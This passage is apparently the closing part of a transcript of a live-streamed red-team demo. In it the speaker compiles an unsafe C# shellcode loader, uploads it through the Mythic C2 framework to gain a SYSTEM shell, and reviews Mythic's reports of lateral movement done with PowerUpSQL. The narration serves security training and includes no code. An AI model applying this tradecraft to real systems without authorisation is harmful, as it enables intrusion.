let's open commando, do ICE, and let's just debug it as a normal person, right? I don't need that as well. So size of both, this should be size of both as well, and that should be fine. So I'm just gonna run that. Yeah, it's not fine. Buff could not be found. Why? There it is. No, C2 is allowed, but not the paid ones, as I mentioned. Oh, I can do len here. So len and len here. There. Nope. What happened now? Oh, the flags. All right, so here. Yeah, there it is. I'm needing that. Always debug your paywalls before you shoot it. Always. All right, and that. What do you want now? I think what you want. I think I know what you want. That. Uh, Nope, it's not that. Unsafe code? Ah, come on. Let's find another one. Yeah, never mind. I need to modify everything if I want the other one. So I need to stick with that. But maybe. Wait, I have an idea. I'm gonna create a new project with that code. Console app 1. Okay. Paste that. Don't need that. And that. Alright, now what you want. Virtual EX Numa, it's not EX Numa, but EX only. Actually, I don't need that, to be honest. Okay. Why do you not liking that one? Create thread. Let's make sure I copy them correctly. So I'm gonna remove all of this and paste it here. Why are you not working? Oh, we need to unsave thing. Alright. Build and then a wall unsave code. Alright. A CPU, a release, a wall unsave code, save. And now should be fine. So let's do release, let's do x64, compile, and let's execute it. Just to make sure it works. Yep, it works. So I can transfer that. That console up there, I'm gonna copy to here. Dove in there. Paste that. Upload that with Mythic. So let's use upload again. Oh, actually, that's assembly. Never mind. Let's first make sure it works. So let's do console. What? Where is that? Desktop stream. Oh, there it is. Never mind. See users public. There. Upload that. And now from the shell we have here, which I hope is still running. Yep, it is. We have system. The file should be there. So let's do dir. And let's do console app1.exe, run it. And finally, we have a system shell in our Mythic C2. Let's do shell. Who am I? Just to be 100% sure. And we have a system. Alright. We have more attacks path to cover, but it's already like 2 hours on the stream, so I'm thinking of cutting it down. Of course, I'm gonna do follow-up videos on that, or maybe follow-up streams. We're gonna think about that. But now, as a final thoughts, I wanna showcase one of the best features in Mythic. So if you go to the reporting part here, and just to generate, let's wait a little bit. Download the report, and you can see how many callbacks I have. Like, from all the boxes I compromise, this includes my testing before that, but I'm gonna locate. Yeah, so this is the first callback we have. So the reporting part is reporting each command you've run, from which user, on what PID, on what domain, on what process name. So we are operating from SVC host the whole time, what date, pretty much anything we want. Right, so that's super nice. I think that was like stolen from the Kobo Strike, but I think it works nice and just super effective. So from here we just see what we did. We register power up SQL, we use that, and from the output we know we executed and did whatever movement via invoke OS CMD. Yeah. Alright, so then we landed on that host, on that PID, again on SVC host, and again doing all kind of stuff. So we can see on the report on Mythic all the activities we did, which I think for any pentest, and especially for red team, is super like required. Now with that, I can say thank you everyone for watching. This video is gonna be uploaded to YouTube and Twitch, so you can see it, and if you miss something, appreciate your time and hope that was useful, guys. So see ya.